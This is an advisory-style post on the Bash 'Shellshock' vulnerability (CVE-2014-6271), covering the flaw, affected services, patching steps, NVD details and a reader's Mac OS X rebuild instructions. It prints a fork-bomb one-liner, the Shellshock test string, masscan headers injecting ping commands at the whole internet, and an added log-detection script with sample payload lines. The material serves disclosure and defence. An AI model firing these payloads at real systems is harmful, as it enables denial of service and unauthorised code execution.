Bourne Again Shell (Bash) Remote Code Execution Vulnerability

Introduction

  • A remotely exploitable vulnerability was discovered by Stephane Chazelas of Akamai in the GNU Bash command shell.
  • The vulnerability has been assigned the CVE identifier CVE-2014-6271.
  • Exploitation of this vulnerability may allow a remote attacker to execute arbitrary code on an affected system.
  • The issue affects all UNIX and UNIX-like systems such as Linux and Mac OS X.

What is Bash?

Bash, or the Bourne Again Shell, is a UNIX shell and perhaps one of the most widely installed utilities on any Linux system. From its creation in 1980, Bash has evolved from a simple terminal-based command interpreter to many other uses.

In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consist of a name that has a value assigned to it. The same is true of the Bash shell. Many programs run the Bash shell in the background. It is often used to provide a shell to a remote user (via SSH or Telnet, for example), provide a parser for CGI scripts (Apache, etc.) or even provide limited command execution support (git, etc.). On Linux systems, system scripts run during boot and by the cron scheduler are typically executed using Bash.

Bash is not the default shell for most commercial UNIX systems, but if Bash is installed as an add-on, it is easy to pass environment variables from other shells to Bash.

For more see: http://en.wikipedia.org/wiki/Bash_(Unix_shell)

Technical Description

Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these Bash functions into environment variables. For example, a well-known denial of service attack against a Linux system defines a function that calls itself:

Linux-terminal-prompt$ : () { : | : & }; :

In the above, “:” is a Bash function name. The code inside the curly brackets is the function calling itself, piping its output into another call to itself, and backgrounding the result. The final “:” invokes the function in the currently running Bash shell.

The particular bug we are talking about begins where the semi-colon in the above invocation finishes. This flaw is triggered when extra code is added to the end of these function definitions (inside the environment variable).
Here is the attack vector:

Linux-terminal-prompt$ x='() { :;}; echo Vulnerable' bash -c 'echo Test'
Vulnerable
Test

If the above command prints “Vulnerable” as the first line, then your installed Bash version is vulnerable to this issue.

Due to the fact that arbitrary code can be put in the execution environment of the Bash shell, this vulnerability is exposed in many contexts, for example:

  1. ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.
  2. Apache servers using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).
  3. PHP scripts executed with mod_php are not affected even if they spawn subshells.
  4. DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.
  5. Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

The patch used to fix this flaw ensures that no code is allowed after the end of a Bash function. So if you run the above example with the patched version of Bash, you should get output similar to:

Linux-terminal-prompt$ x='() { :;}; echo Vulnerable' bash -c 'echo Test'
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
Test

HTTP–based Remote Attack Potential

Errata Security LLC ran an Internet-wide scan, as reported by well-known blogger Troy Hunt. Imagine HTTP requests generated from “masscan” configuration parameters that look like this:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

Which, when issued against a range of vulnerable IP addresses, results in this:

[Figure: bash bug - Checkmate]

Shown above are ping responses from vulnerable Apache servers sent back to Robert Graham’s server. The vulnerability lies in CGI scripts that utilize Bash to process HTTP data. Effectively this is ‘arbitrary code injection’ into the remote Bash shell without authentication. Burp Suite, a favourite tool of pentesters, has also gained a scanning module that checks for this issue.
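One way to find requests like the scan above in web server logs (an added example, not code from the original article or from Errata Security). It assumes Apache's combined log format; the function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag access-log fields that begin with the Bash
# function-definition prefix "() {" seen in the scan headers above.

# Constructed sample lines in Apache "combined" log format
# (documentation-range addresses; not real traffic).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.0" 200 0 "() { :; }; ping -c 3 203.0.113.5" "shellshock-scan"
203.0.113.9 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 500 0 "-" "() { :;}; echo Vulnerable"
192.0.2.44 - - [25/Sep/2014:10:00:04 +0000] "GET /docs HTTP/1.1" 200 90 "-" "notes-about-() {-syntax/1.0"
EOF
}

# Reads log lines on stdin; prints "source<TAB>field<TAB>value" per hit.
# Splitting on the double quote puts request, Referer and User-Agent in
# fields 2, 4 and 6. Any later field that starts with "() {" is reported,
# so an escaped quote that shifts the numbering cannot hide a hit.
detect_shellshock() {
    awk -F'"' '
    BEGIN { label[2] = "request"; label[4] = "referer"; label[6] = "user-agent" }
    {
        split($1, head, " ")                    # head[1] is the client address
        for (i = 2; i <= NF; i++) {
            if (index($i, "() {") == 1) {       # literal prefix, not a regex
                name = (i in label) ? label[i] : "other"
                printf "%s\t%s\t%s\n", head[1], name, $i
            }
        }
    }'
}

# The default combined format records only Referer and User-Agent, so the
# Cookie and Host variants need those headers added to the LogFormat.
sample_log | detect_shellshock
```

The fourth sample line contains the marker in the middle of the User-Agent and is not reported, because only a value that starts with it matches the header shape used in the scan.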

Mitigations

On RedHat/Fedora/CentOS run

Linux-prompt# yum update bash

On Debian/Ubuntu based systems

Linux-prompt# apt-get update && apt-get upgrade bash

For Solaris, Mac OS X and other Unices, the current option is to compile and install a patched version of Bash from GNU.

Workarounds

Red Hat has released a number of workarounds for different Linux sub-systems which can be reviewed here.

SANS Webcast on the Vulnerability

https://isc.sans.edu/forums/diary//18709

Common Vulnerability Exposure Details

Vulnerability Summary for CVE-2014-6271
Original release date: 09/24/2014
Last revised: 09/26/2014
Source: US-CERT/NIST

Overview
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Impact

  • CVSS Severity (version 2.0):
    • CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
    • Impact Subscore: 10.0
    • Exploitability Subscore: 10.0
  • CVSS Version 2 Metrics:
    • Access Vector: Network exploitable
    • Access Complexity: Low
    • Authentication: Not required to exploit
    • Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service

References to Advisories, Solutions, and Tools

External Source: CONFIRM

Name: https://bugzilla.redhat.com/show_bug.cgi?id=1141597

Type: Patch Information

Hyperlink: https://bugzilla.redhat.com/show_bug.cgi?id=1141597

External Source: CONFIRM

Name: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Hyperlink: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Vulnerable software and versions
* cpe:/a:gnu:bash:1.14.0
* cpe:/a:gnu:bash:1.14.1
* cpe:/a:gnu:bash:1.14.2
* cpe:/a:gnu:bash:1.14.3
* cpe:/a:gnu:bash:1.14.4
* cpe:/a:gnu:bash:1.14.5
* cpe:/a:gnu:bash:1.14.6
* cpe:/a:gnu:bash:1.14.7
* cpe:/a:gnu:bash:2.0
* cpe:/a:gnu:bash:2.01
* cpe:/a:gnu:bash:2.01.1
* cpe:/a:gnu:bash:2.02
* cpe:/a:gnu:bash:2.02.1
* cpe:/a:gnu:bash:2.03
* cpe:/a:gnu:bash:2.04
* cpe:/a:gnu:bash:2.05
* cpe:/a:gnu:bash:2.05:a
* cpe:/a:gnu:bash:2.05:b
* cpe:/a:gnu:bash:3.0
* cpe:/a:gnu:bash:3.0.16
* cpe:/a:gnu:bash:3.1
* cpe:/a:gnu:bash:3.2
* cpe:/a:gnu:bash:3.2.48
* cpe:/a:gnu:bash:4.0
* cpe:/a:gnu:bash:4.0:rc1
* cpe:/a:gnu:bash:4.1
* cpe:/a:gnu:bash:4.2
* cpe:/a:gnu:bash:4.3

* Denotes Vulnerable Software

Technical Details
Vulnerability Type

OS Command Injections (CWE-78)
CVE Standard Vulnerability Entry http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

References

  1. http://www.openwall.com/lists/oss-security/2014/09/24/11
  2. https://access.redhat.com/articles/1200223
  3. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
  4. https://securityblog.redhat.com/
  5. https://www.us-cert.gov/ncas/current-activity/2014/09/24/Bourne-Again-Shell-Bash-Remote-Code-Execution-Vulnerability
  6. https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271
  7. http://garage4hackers.com/entry.php?b=3087
  8. http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
  9. https://web.nvd.nist.gov/view/vuln/search-results?query=cve-2014-6271&search_type=all&cves=on

2 comments

How to fix the Shell Shock vulnerability for Mac OS X

$ mkdir bash-fix
$ cd bash-fix
$ curl https://opensource.apple.com/tarballs/bash/bash-92.tar.gz | tar zxf -
$ cd bash-92/bash-3.2
$ curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052 | patch -p0
$ curl https://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-053 | patch -p0
$ cd ..
$ sudo xcodebuild
$ sudo cp /bin/bash /bin/bash.old
$ sudo cp /bin/sh /bin/sh.old
$ build/Release/bash --version # GNU bash, version 3.2.53(1)-release
$ build/Release/sh --version # GNU bash, version 3.2.53(1)-release
$ sudo cp build/Release/bash /bin
$ sudo cp build/Release/sh /bin

Excellent, thanks for the information!

Apple has also now released a patch for the same: https://support.apple.com/kb/dl1769
